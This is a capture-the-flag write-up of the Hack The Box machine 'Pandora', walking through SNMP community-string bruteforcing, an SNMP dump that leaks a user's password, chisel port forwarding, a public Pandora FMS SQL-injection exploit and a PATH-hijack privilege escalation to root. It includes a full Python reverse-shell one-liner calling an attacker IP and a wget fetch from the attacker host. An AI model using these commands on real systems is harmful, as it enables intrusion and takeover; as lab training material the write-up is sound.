👨‍💻👾👨‍💻👾👨‍💻👾

Search

SearchSearch

HTB-Pandora

Jan 07, 20255 min read

Information Gathering

Rustscan

Rustscan finds SSH and HTTP running on TCP:

┌──(yoon㉿kali)-[~/Documents/htb]
└─$ rustscan --addresses 10.10.11.136 --range 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢
<snip>
Host is up, received syn-ack (0.26s latency).
Scanned at 2024-04-11 03:02:02 EDT for 0s
 
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
 
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds

Nmap UDP

UDP scan discovers SNMP running on UDP port 161:

Enumertion on TCP

HTTP - TCP 80

Website shows the domain name panda.htb which I add to /etc/hosts:

Both directory bruteforce and subdomain bruteforce has no useful information so I will move on to UDP from here.

Enumeration on UDP

SNMP - UDP 161

In SNMP (Simple Network Management Protocol), a community string is essentially a password or a key that acts as a form of authentication between an SNMP manager (or client) and an SNMP agent (or server).

Using hydra I will first try bruteforcing Community String:

hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.11.136 snmp

hydra successfully discovers the password: public

In SNMP (Simple Network Management Protocol), MIB stands for Management Information Base. It’s a virtual database that contains a hierarchical structure of managed objects. These objects represent various aspects of the managed network devices, such as hardware, software, configuration settings, performance metrics, and more.

Below are some known MIB values on SNMP that could be useful to query:

1.3.6.1.2.1.25.1.6.0    System Processes
1.3.6.1.2.1.25.4.2.1.2  Running Programs
1.3.6.1.2.1.25.4.2.1.4  Processes Path
1.3.6.1.2.1.25.2.3.1.4  Storage Units
1.3.6.1.2.1.25.6.3.1.2  Software's Installed & Hotfixes
1.3.6.1.2.1.6.13.1.3    TCP Local Ports
1.3.6.1.2.1.1.1         System Description

For instance, I can query running programs as such:

snmpwalk -c public -v1 10.10.11.136 1.3.6.1.2.1.25.4.2.1.2

I can also query system description as such:

snmpwalk -c public -v1 10.10.11.136 1.3.6.1.2.1.1.1

Shell as daniel

snmpbulkwalk

Dumping the entire SNMP tree using snmpwalk -v 2c -c public 10.10.11.136 takes too much time so I will move on to faster way of dumping using snmpbulkwalk.

I will frist download relevant packages using sudo apt install snmp-mibs-downloader.

Once installed, I will open /etc/snmp/snmp.conf and comment out the ‘mibs’ line as such:

Now with snmpbulkwalk ready, I will dump the entire SNMP tree and save it to a txt file:

snmpbulkwalk -c public -v2c 10.10.11.136 > snmp-full-bulk

The dump was 6920 lines long and after spending some time analyzing, it reveals the plain text password for user daniel: HotelBabylon23

Now using the credeitals above, I have a SSH connection as daniel:

Privesc: daniel to matt

Local Enumeration

Taking a look at /etc/passwd, there is user matt on system:

cat /etc/passwd | grep /bin/bash

Since user.txt is located in matt’s home folder without reading access, privilege escalation should be done towards user matt.

I do see interesting SUID file called /usr/bin/pandora_backup but it is owned by user matt, so I would first have to escalate my privilege.

On /etc/apache2/sites-enabled, I see pandora.conf file, which implies there’s another website running internally:

It seems like pandora.panda.htb is running locally on port 80:

I can confirm this through netstat -ntlp command, seeing port 80 is open internally:

On /var/www/pandora, I can access files for the internal website:

Port Forwarding

To access the website through web browser, I will port forward internal port 80 to local side using chisel.

I will first download chisel to pandora server using wget http://10.10.14.14:8000/chisel_linux.

Now with chisel server running locally on Kali machine, I will start the client session on pandora server:

I get a incoming chisel server running on kali machine:

Now I can access the internal website on my Kali web browser:

SQLi to RCE

At the bottom of the website, version for Pandora FMS is revealed:

This version is vulnerable to Remote code execution and SQL injection but RCE requires user creds so my only option left is SQLi.

Using this github source, I can spawn a shell as user matt:

sudo python sql.py -t 127.0.0.1 -f rev.php

Since the shell is very restricted, I will spawn another reverse shell through this shell connection by running the following command towards my netcat listener running on Kali machine:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I have a shell as matt:

SSH Persistence

Since reverse shell connection is not stable, I will further develop my privilege as matt by creating ssh key.

Following this guide, I will create ssh private and public key on matt’s home directory:

Now using the private key, I can SSH-in as user matt:

ssh -i mykey matt@10.10.11.136

Privesc: matt to root

SUID

Remembering about interesting SUID found earlier, I will take a look at /usr/bin/pandora_backup

Root owns this file but group matt can run this file as root.

Running the file, I can see that backup is being made to some end point:

It seems like all the files in /var/www/pandora/pandora_console is being backedup:

I can take a rough look at it through cat and it seems like tar is being used to make backup to /root/.backup:

I can take a better look at it using ltrace:

ltrace /usr/bin/pandora_backup

Because there’s no path given for tar, it will use the current user’s PATH environment variable to look for valid executables to run. But I can control that path, which makes this likely vulnerable to path hijack.

I’ll work from /dev/shm, and add that to the current user’s PATH:

Now the first place it will look for tar is /dev/shm.

I will create a simple payload that will run bash as root inside tar as such:

Running pandora_backup will spawn a shell as root:

References

Graph View

Backlinks

  • No backlinks found